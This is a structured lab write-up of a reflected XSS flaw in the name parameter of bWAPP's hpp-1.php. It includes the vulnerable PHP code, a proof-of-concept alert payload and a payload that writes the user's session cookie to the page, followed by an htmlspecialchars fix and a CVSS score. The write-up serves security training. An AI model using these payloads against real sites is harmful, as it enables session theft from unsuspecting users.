# language: en

Feature:
  TOE:
    bWAPP
  Category:
    Other bugs
  Page name:
    bWAPP/hpp-1.php
    bWAPP/hpp-2.php
    bWAPP/hpp-3.php
  CWE:
    CWE-79: XSS Reflected
  Goal:
    Inject javascript code in the site
  Recommendation:
    Sanitize user input variables

  Background:
  Hacker's software:
    | <Name>                       | <Version>          |
    | Kali GNU/Linux               | 4.18.0-kali1-amd64 |
    | Firefox Quantum              | 60.2.0             |
    | Burp Suite Community Edition | 1.7.36             |
  TOE information:
    Given I am accessing bWAPP/hpp-1.php
    And enter a php site that asks me to introduce my name
    And then redirects me to bWAPP/hpp-2.php in which I vote for a movie
    And then that site redirects me to bWAPP/hpp-3.php
    And I see a voting confirmation message
    And the site is running on bee-box 1.6.7 in Virtualbox 5.2.18:
    """
    Ubuntu 8.04, kernel=2.6.24-16-generic, MySQL 5.0.99, Apache 2.2.8, PHP 5.2.4
    """
    And the site is running on low security_level

  Scenario: Normal use case
  Voting for a movie
    Given I access the site bWAPP/hpp-1.php
    And type "This is a test" on the textfield
    And click on "Continue"
    Then I get redirected to bWAPP/hpp-2.php
    And I can vote for a movie from a list:
    """
    | Title    | Release | Character       | Genre  | Vote |
    | Iron Man | 2008    | Tony Stark      | action | Vote |
    ... #More movies
    """
    And I click on "Vote" for "Iron Man"
    Then I get redirected to bWAPP/hpp-3.php
    And see the following message:
    """
    Your favorite movie is: Iron Man
    Thank you for submitting your vote!
    """

  Scenario: Static detection
  User input for is not being sanitized
    When I look at the code
    Then the vulnerability is caused by the variable "$name" not being sanitized
    """
    30 $name = $_GET["name"];
    31 $message = "<p>Hello " . ucwords(xss_check_3($name)) \
       . ", please vote for your favorite movie.</p>";
    """
    Then I can conclude that due to the lack of sanitization I can make a XSS

  Scenario: Dynamic detection
  The site is vulnerable to XSS attacks
    Given I type an injection into the textfield that asks me to type my name
    """
    /> <script>alert("Test")</script>
    """
    And click on the "continue" button
    Then I see an alert popup with the message "Test" for each row of the table
    And this is how the output table looks:
    """
    Hello /> <script>alert("Test")</script>, please vote for your favorite \
    movie.

    Remember, Tony Stark wants to win every time...
    | Title        | Release | Character  | Genre  | Title             |
    | Iron Man     | 2008    | Tony Stark | action | &action=vote>Vote |
    | Man of Steel | 2013    | Clark Kent | action | &action=vote>Vote |
    ... #More movies
    """
    Then  XSS attacks can be made by injecting code in the name textfield.

  Scenario: Exploitation
  Gettings cookies from user
    Given I know I can make an XSS attack to the site
    Then I can inject the following injection into the name textfield:
    """
    /> <script>document.write(document.cookie);</script>
    """
    Then I get the output:
    """
    Hello /> <script>document.write(document.cookie);</script>, \
    please vote for your favorite movie.

    Remember, Tony Stark wants to win every time...
    | Title        | Release | Character  | Genre  | Title  |
    | Iron Man     | 2008    | Tony Stark | action | OUTPUT |
    | Man of Steel | 2013    | Clark Kent | action | OUTPUT |
    Where OUTPUT = security_level=0; \
    PHPSESSID=fb90e7c58ee8dafecf0fdda0910a8462&action=vote>Vote
    """
    Then I can conclude that getting user cookies via Reflected XSS
    And redirecting them to a third site owned by a hacker is feasible.

  Scenario: Remediation
  The PHP code can be fixed by using the htmlspecialchars function
    When I use htmlspecialchars before building the final message displayed
    Then I make the "$name" parameter invulnerable XSS attacks:
    """
    30 $name = $_GET["name"];
    31 $name = htmlspecialchars($name, ENT_QUOTES, 'UTF-8');
    32 $message = "<p>Hello " . ucwords(xss_check_3($name)) \
       . ", please vote for your favorite movie.</p>";
    """
    Then If I re-enter the following injection
    """
    /> <script>alert("Test")</script>
    """
    Then I get the following output:
    """
    Hello /&gt; &lt;script&gt;alert(&quot;Test&quot;)&lt;/script&gt;, \
    please vote for your favorite movie.

    Remember, Tony Stark wants to win every time...
    | Title    | Release | Character  | Genre  | Vote |
    | Iron Man | 2008    | Tony Stark | action | Vote |
    ... #More movies
    """
    Then the vulnerability was successfully patched
    And data can't be leaked anymore

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
    Base: Attributes that are constants over time and organizations
      5.4/10 (Medium) - AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N/
    Temporal: Attributes that measure the exploit's popularity and fixability
      5.3/10 (Medium) - E:H/RL:W/RC:C/
    Environmental: Unique and relevant attributes to a specific user environment
      4.1/10 (Low) - CR:L/IR:L/AR:L

  Scenario: Correlations
    No correlations have been found to this date 2018-10-24
